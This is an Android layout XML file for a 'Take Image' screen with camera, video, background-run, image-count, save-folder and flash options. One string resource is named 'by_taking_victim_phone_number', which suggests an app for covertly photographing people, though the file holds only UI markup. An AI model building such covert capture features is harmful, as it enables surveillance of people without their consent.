<?xml version="1.0" encoding="utf-8"?>
<FrameLayout
    xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:app="http://schemas.android.com/apk/res-auto"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:orientation="vertical">


    <LinearLayout
        android:id="@+id/parentLayout"
        android:layout_width="match_parent"
        android:layout_height="match_parent"
        android:background="@color/grey_light"
        android:orientation="vertical">


        <android.support.v7.widget.Toolbar
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:background="?colorAccent"
            android:contentInsetEnd="0dp"
            android:contentInsetLeft="0dp"
            android:contentInsetRight="0dp"
            android:contentInsetStart="0dp"
            app:contentInsetEnd="0dp"
            app:contentInsetLeft="0dp"
            app:contentInsetRight="0dp"
            app:contentInsetStart="0dp">


            <Button
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:background="@android:color/transparent"
                android:gravity="center"
                android:text="Take Image"
                android:textColor="@color/white"
                android:textSize="@dimen/title"
                android:textStyle="bold"/>


        </android.support.v7.widget.Toolbar>


        <ScrollView
            android:layout_width="match_parent"
            android:layout_height="wrap_content">


            <LinearLayout
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:orientation="vertical">


                <LinearLayout
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:background="@color/white"
                    android:onClick="byShowingPicture"
                    android:orientation="horizontal"
                    android:padding="20dp">


                    <ImageView
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:src="@drawable/ic_menu_camera"
                        android:tint="?colorAccent"/>

                    <LinearLayout
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:layout_marginLeft="10dp"
                        android:orientation="vertical">


                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="@string/by_showing_pictures"
                            android:textColor="@color/black"
                            android:textSize="@dimen/title"
                            android:textStyle="bold"/>

                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="Click images by showing pictures"
                            android:textColor="@color/black"/>


                    </LinearLayout>


                </LinearLayout>


                <LinearLayout
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:layout_marginTop="10dp"
                    android:background="@color/white"
                    android:onClick="byShowingVideo"
                    android:orientation="horizontal"
                    android:padding="20dp">


                    <ImageView
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:src="@drawable/ic_video"
                        android:tint="?colorAccent"/>

                    <LinearLayout
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:layout_marginLeft="10dp"
                        android:orientation="vertical">


                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="@string/by_showing_video_s"
                            android:textColor="@color/black"
                            android:textSize="@dimen/title"
                            android:textStyle="bold"/>

                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="Click images by showing pictures"
                            android:textColor="@color/black"/>


                    </LinearLayout>


                </LinearLayout>


                <LinearLayout
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:layout_marginTop="10dp"
                    android:background="@color/white"
                    android:onClick="byTakingPhoneNumber"
                    android:orientation="horizontal"
                    android:padding="20dp">


                    <ImageView
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:src="@drawable/ic_phone"
                        android:tint="?colorAccent"/>

                    <LinearLayout
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:layout_marginLeft="10dp"
                        android:orientation="vertical">


                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="@string/by_taking_victim_phone_number"
                            android:textColor="@color/black"
                            android:textSize="@dimen/title"
                            android:textStyle="bold"/>

                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="Click images by showing pictures"
                            android:textColor="@color/black"/>


                    </LinearLayout>


                </LinearLayout>


                <LinearLayout
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:layout_marginTop="10dp"
                    android:background="@color/white"
                    android:onClick="runInBackground"
                    android:orientation="horizontal"
                    android:padding="20dp">


                    <ImageView
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:src="@drawable/ic_menu_camera"
                        android:tint="?colorAccent"/>

                    <LinearLayout
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:layout_marginLeft="10dp"
                        android:orientation="vertical">


                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="@string/run_application_in_background"
                            android:textColor="@color/black"
                            android:textSize="@dimen/title"
                            android:textStyle="bold"/>

                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="Application will run in background"
                            android:textColor="@color/black"/>


                    </LinearLayout>


                </LinearLayout>


                <TextView
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:background="?colorAccent"
                    android:fontFamily="serif-monospace"
                    android:padding="15dp"
                    android:text="Settings"
                    android:textColor="@color/white"
                    android:textSize="22sp"
                    android:textStyle="bold"/>


                <LinearLayout
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:background="@color/white"
                    android:onClick="SelectCamera"
                    android:orientation="horizontal"
                    android:padding="20dp">


                    <ImageView
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:src="@drawable/ic_menu_camera"
                        android:tint="?colorAccent"/>

                    <LinearLayout
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:layout_marginLeft="10dp"
                        android:orientation="vertical">


                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="@string/select_camera"
                            android:textColor="@color/black"
                            android:textSize="@dimen/title"
                            android:textStyle="bold"/>

                        <TextView
                            android:id="@+id/tvSelectCamera"
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="Front / Rear"
                            android:textColor="@color/black"
                            android:textStyle="italic"/>


                    </LinearLayout>


                </LinearLayout>


                <LinearLayout
                    android:id="@+id/layoutNumberOfImages"
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:layout_marginTop="10dp"
                    android:background="@color/white"
                    android:onClick="SelectNumberOfImages"
                    android:orientation="horizontal"
                    android:padding="20dp">


                    <ImageView
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:src="@drawable/ic_imagestack"
                        android:tint="?colorAccent"/>

                    <LinearLayout
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:layout_marginLeft="10dp"
                        android:orientation="vertical">


                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="@string/number_of_image_taking"
                            android:textColor="@color/black"
                            android:textSize="@dimen/title"
                            android:textStyle="bold"/>

                        <TextView
                            android:id="@+id/tvImageCount"
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="count"
                            android:textColor="@color/black"
                            android:textStyle="italic"/>


                    </LinearLayout>


                </LinearLayout>


                <LinearLayout
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:layout_marginTop="10dp"
                    android:background="@color/white"
                    android:onClick="saveIn"
                    android:orientation="horizontal"
                    android:padding="20dp">


                    <ImageView
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:src="@drawable/ic_save"
                        android:tint="?colorAccent"/>

                    <LinearLayout
                        android:layout_width="wrap_content"
                        android:layout_height="wrap_content"
                        android:layout_marginLeft="10dp"
                        android:orientation="vertical">


                        <TextView
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="@string/save_in"
                            android:textColor="@color/black"
                            android:textSize="@dimen/title"
                            android:textStyle="bold"/>

                        <TextView
                            android:id="@+id/tvFolderName"
                            android:layout_width="wrap_content"
                            android:layout_height="wrap_content"
                            android:text="Folder name"
                            android:textColor="@color/black"
                            android:textStyle="italic"/>


                    </LinearLayout>


                </LinearLayout>


                <LinearLayout
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:layout_marginTop="10dp"
                    android:background="@color/white"
                    android:orientation="horizontal"
                    android:padding="20dp">


                    <android.support.v7.widget.SwitchCompat
                        android:id="@+id/switchbtn"
                        android:layout_width="match_parent"
                        android:layout_height="wrap_content"
                        android:text="@string/flash"
                        android:textColor="@color/black"
                        android:textSize="@dimen/title"
                        android:textStyle="bold"/>


                </LinearLayout>


            </LinearLayout>


        </ScrollView>


    </LinearLayout>


    <!--<View
        android:id="@+id/revealView"
        android:layout_width="match_parent"
        android:layout_height="match_parent"
        android:transitionName="trans"/>
-->

</FrameLayout>
